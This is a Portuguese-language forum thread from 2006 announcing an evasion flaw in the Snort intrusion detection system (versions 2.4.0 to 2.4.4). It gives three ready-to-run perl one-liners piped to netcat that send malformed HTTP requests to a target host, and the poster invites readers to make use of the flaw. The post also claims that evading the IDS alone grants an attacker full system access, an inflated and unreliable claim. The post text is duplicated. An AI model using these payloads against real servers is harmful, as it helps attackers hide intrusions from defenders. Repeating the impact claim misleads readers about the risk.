Title: Falha no Snort
Post by: HadeS on 04 de June , 2006, 12:21:38 PM
Post by: HadeS on 04 de June , 2006, 12:21:38 PM
Uma falha novinha do Snort (Sistema de IDS mais famoso do mundo Unix), pode comprometer um sistema totalmente.
A falha está, basicamente, nas regras do Snort, detecção de evasão.
O atacante pode enviar pacotes maliciosos, que passaram sem problemas pelo IDS, e assim podendo comprometer totalmente o sistema. Um ataque bem sucedido pode dar acesso total ao atacante.
Algumas informações técnicas sobre a falha:
Nome: Snort URIContent Rules Detection Evasion Vulnerability
Tipo: Remota
Versões vulneráveis: Snort Project Snort 2.4.4 (A mais recente
)
Snort Project Snort 2.4.3
Snort Project Snort 2.4.2
Snort Project Snort 2.4.1
Snort Project Snort 2.4.0
Três exeplos simples de exploração:
perl -e'print "GET /www.SEU_SITE.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc SERVIDOR.VULNERAVEL 80
perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc IP.DO.CARA.AQUI 80
perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc IP.DO.CARA.AQUI 80
Acho que deu pra entender, e ter uma noção da falha né? É crítica, todas as versões estão vulneráveis, ainda disconheço algum patch, e a maioria dos servidores Unix usam Snort. Façam bom proveito da falha, e de modo consiente.
HadeS
A falha está, basicamente, nas regras do Snort, detecção de evasão.
O atacante pode enviar pacotes maliciosos, que passaram sem problemas pelo IDS, e assim podendo comprometer totalmente o sistema. Um ataque bem sucedido pode dar acesso total ao atacante.
Algumas informações técnicas sobre a falha:
Nome: Snort URIContent Rules Detection Evasion Vulnerability
Tipo: Remota
Versões vulneráveis: Snort Project Snort 2.4.4 (A mais recente
)Snort Project Snort 2.4.3
Snort Project Snort 2.4.2
Snort Project Snort 2.4.1
Snort Project Snort 2.4.0
Três exeplos simples de exploração:
perl -e'print "GET /www.SEU_SITE.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc SERVIDOR.VULNERAVEL 80
perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc IP.DO.CARA.AQUI 80
perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc IP.DO.CARA.AQUI 80
Acho que deu pra entender, e ter uma noção da falha né? É crítica, todas as versões estão vulneráveis, ainda disconheço algum patch, e a maioria dos servidores Unix usam Snort. Façam bom proveito da falha, e de modo consiente.
HadeS
Title: Re: Falha no Snort
Post by: _Dr4k0_ on 04 de June , 2006, 12:35:31 PM
Post by: _Dr4k0_ on 04 de June , 2006, 12:35:31 PM
interessante isso..
galera usa snort..
eu gosto muito dele apesar de não usar linux..
galera usa snort..
eu gosto muito dele apesar de não usar linux..
Title: Re: Falha no Snort
Post by: Anonymous on 06 de June , 2006, 02:03:11 PM
Post by: Anonymous on 06 de June , 2006, 02:03:11 PM
Tá aí mais uma prova que nada é seguro. Nem mesmo um sistema do mundo Unix.